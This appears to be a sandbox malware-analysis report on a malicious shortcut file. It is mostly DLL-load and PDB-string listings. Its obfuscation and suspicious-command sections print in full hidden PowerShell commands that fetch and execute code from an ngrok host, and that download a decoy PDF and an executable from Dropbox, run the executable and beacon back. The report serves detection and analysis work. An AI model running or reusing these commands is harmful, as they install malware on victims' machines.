Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ieframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Section loaded: k7rn7l32.dll
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Section loaded: ntd3ll.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: mswsock.dll

Source: C:\Windows\SysWOW64\fontdrvhost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: pkqLAMAv96.lnk

LNK file: ..\..\..\..\Windows\System32\cmd.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: softy.pdb source: powershell.exe, 0000000F.00000002.2293605870.000001CA22E80000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2297215920.000001D224690000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 0000000F.00000002.2295003833.000001CA22F7F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365946962.00000000054D0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365827330.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2370563632.0000000003A00000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2296940479.000001D224642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2297073390.000001D22465A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 0000000F.00000002.2297150603.000001D224660000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb3 source: powershell.exe, 0000000F.00000002.2297073390.000001D22465A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2366306467.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2366537028.00000000055D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2371047023.0000000005690000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2371296262.00000000058B0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: d:\assassin\assassin-playground\dx10_integration\main\output\win32\exe\scimitar_dx10_f.pdb source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000000.2204199824.000000000177E000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.000000000177E000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: ntdll.pdb source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2364591216.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2364834495.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2369002536.0000000005690000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb> source: powershell.exe, 0000000F.00000002.2297215920.000001D224690000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365289877.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365513945.0000000005550000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2369734266.0000000005690000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2364591216.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2364834495.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2369002536.0000000005690000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365289877.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365513945.0000000005550000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2369734266.0000000005690000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: softy.pdbvice source: powershell.exe, 0000000F.00000002.2293605870.000001CA22E80000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbE source: powershell.exe, 0000000F.00000002.2296940479.000001D224642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbw source: powershell.exe, 0000000F.00000002.2296993036.000001D22464D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365946962.00000000054D0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365827330.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2370563632.0000000003A00000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2366306467.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2366537028.00000000055D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2371047023.0000000005690000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2371296262.00000000058B0000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

PowerShell case anomaly found

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing)
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing)
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing)	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing)
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/3fee076f9528f690839c19be95e034f2'; }"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing)	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/3fee076f9528f690839c19be95e034f2'; }"

Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe.15.dr	Static PE information: section name: _RDATA
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe.15.dr	Static PE information: section name: .data1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4AFB8426 pushad ; ret	15_2_00007FFB4AFB845D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4AFB845E push eax; ret	15_2_00007FFB4AFB846D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4AFB00BD pushad ; iretd	15_2_00007FFB4AFB00C1
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C6A0F9 push FFFFFF82h; iretd	28_3_02C6A0FB
